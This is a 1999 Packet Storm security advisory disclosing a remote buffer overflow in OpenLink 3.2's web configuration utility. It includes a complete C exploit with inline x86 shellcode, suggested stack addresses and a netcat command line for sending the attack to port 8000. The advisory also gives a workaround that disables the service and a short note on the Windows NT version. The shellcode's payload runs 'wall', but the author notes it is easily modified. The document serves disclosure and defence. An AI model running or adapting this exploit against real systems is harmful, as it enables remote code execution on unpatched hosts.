openlink.3.2.txt

1999-10-18T00:00:00
ID PACKETSTORM:11714
Type packetstorm
Reporter Tymm Twillman
Modified 1999-10-18T00:00:00

Description

                                        
                                            `  
Overview:  
  
A serious security hole has been found in the web configuration utility  
that comes with OpenLink 3.2. This hole will allow remote users to  
execute arbitrary code as the user id under which the web configurator is  
run (inherited from the request broker, oplrqb). The hole is a  
run-of-the-mill buffer overflow, due to lack of parameter checking when  
strcpy() is used.  
  
Background:  
  
OpenLink is a database request broker, used for a generic interface to  
different database vendors' products. By default, a web configuration  
utility is installed, which runs at port 8000. For more information, see  
OpenLink Software's web site at http://www.openlinksw.com.  
  
Exploit:  
  
This exploit has been coded to be benign, and is just for illustration of  
the hole in the configuration utility. Furthermore, it has not been coded  
for portability (no promises that it will function if compiled with  
anything other than egcs-2.91.66, and it will not compile on a non-x86  
compiler). This works against the linux glibc version of OpenLink 3.2's  
configurator. It can easily be modified for other purposes, however, and  
I have reason to believe that the majority, if not all, platforms are  
vulnerable to such an attack.  
  
A stack address may be specified on the command line (I've had luck with  
0xbffffb65, 0xbffffb85 or 0xbffffbe5). Output of this should be piped  
through netcat, e.g.  
  
./oplwall 0xbffffb85 | nc machine.to.hit 8000  
  
--- cut ---  
#include <stdio.h>  
#include <unistd.h>  
  
/*  
* Exploit for Openlink's web configurator for Linux/glibc2  
* use: pipe through netcat to openlink web port (8000 default)  
* ex: ./oplwall 0xbffffb85 | nc machine.to.hit 8000  
* makes www_sv execute /usr/bin/wall if you hit the address right  
*  
* For informational purposes only. This was written to show that  
* there's a problem, not for skr1pt k1dd33z --.  
* don't ask me for help on how to use this to crack systems,  
* help compiling or anything else. It will only compile on  
* an x86 compiler however.  
*  
* Addresses that work for me: 0xbffffb65 (initial run of the broker)  
* 0xbffffb85 (all consecutive attempts)  
* probably tied to process ID www_sv runs as;  
* first try PIDs were in triple digits, others  
* 4 digit PIDs.  
*  
* If this works, generally no more www_sv processes will be run as a side effect.  
*/  
  
void test() {  
  
__asm__("  
  
jmp doit  
exploit:  
  
# code basically from Aleph One's smash stacking article, with  
# minor mods  
  
popl %esi  
movb $0xd0, %al # Get a / character into %al  
xorb $0xff, %al  
movb %al, 0x1(%esi) # drop /s into place  
movb %al, 0x5(%esi)  
movb %al, 0x9(%esi)  
xorl %eax,%eax # clear %eax  
movb %eax,0xe(%esi) # drop a 0 at end of string  
movl %eax,0x13(%esi) # drop NULL for environment  
leal 0x13(%esi),%edx # point %edx to environment  
movl %esi,0xf(%esi) # drop pointer to argv  
leal 0xf(%esi),%ecx # point %ecx to argv  
movl %esi,%ebx # point ebx to command - 1  
inc %ebx # fix it to point to the right place  
movb $0xb,%al # index to execve syscall  
int $0x80 # execute it  
xorl %ebx,%ebx # if exec failed, exit nicely...  
movl %ebx,%eax  
inc %eax  
int $0x80  
doit:  
call exploit  
.string \"..usr.bin.wall.\"  
");  
  
}  
  
char *shellcode = ((char *)test) + 3;  
  
char code[1000];  
  
int main(int argc, char *argv[])  
  
{  
int i;  
int left;  
unsigned char where[] = {"\0\0\0\0\0"} ;  
int *here;  
char *dummy;  
long addr;  
  
  
if (argc > 1)  
addr = strtoul(argv[1], &dummy, 0);  
else  
addr = 0xbffffb85;  
  
fprintf(stderr, "Setting address to %8x\n", addr);  
  
  
  
*((long *)where) = addr;  
  
strcpy(code, shellcode);  
  
for (i = 0; i < 64; i++) {  
strcat(code, where);  
}  
  
printf("GET %s\n", code);  
  
exit(0);  
  
}  
  
--- cut ---  
  
Workaround:  
  
Disable the www_sv application in oplrqb.ini. By default there is a  
section labeled Persistent Services, with the line  
"Configurator = www_sv". This section, along with the entire www_sv  
section, should be commented out with semicolons, e.g.  
  
;[Persistent Services]  
;Configurator = www_sv  
  
;[www_sv]  
;Program = w3config/www_sv  
;Directory = w3config  
;CommandLine =  
;Environment = WWW_SV  
  
;[Environment WWW_SV]  
  
Discussion:  
  
OpenLink software has been notified of the problem is is apparently  
working on a solution. I have serious concerns that the package may be  
prone to other attacks, but have no confirmation of this (other than basic  
DOS attacks). My suggestion is to definitely make sure any machine running  
the OpenLink broker is well protected behind a firewall, and it should not  
allow logins from untrusted persons.  
  
Kudos to:  
  
Aleph One, for his long-lived stack smashing article, and this  
whole BugTraq thing.  
  
Hobbit, of course, for netcat.  
  
-Tymm  
  
  
  
The NT version is vulnerable to a boundary condition as well. If memory  
serves (I looked at this last april, so it may be foggy) I was able to  
sucessfully modify the EIP but found no obvious way to get back to the  
overflowing buffer (where my egg would be). When I left off I found some  
code that would jump me back a little bit before the buffer.  
Unfortunately, the data formed some invalid opcodes, so no luck. I'm sure  
someone can figure it out, I'm sick having my clock off by 6 hours from  
SoftIce warp :)  
`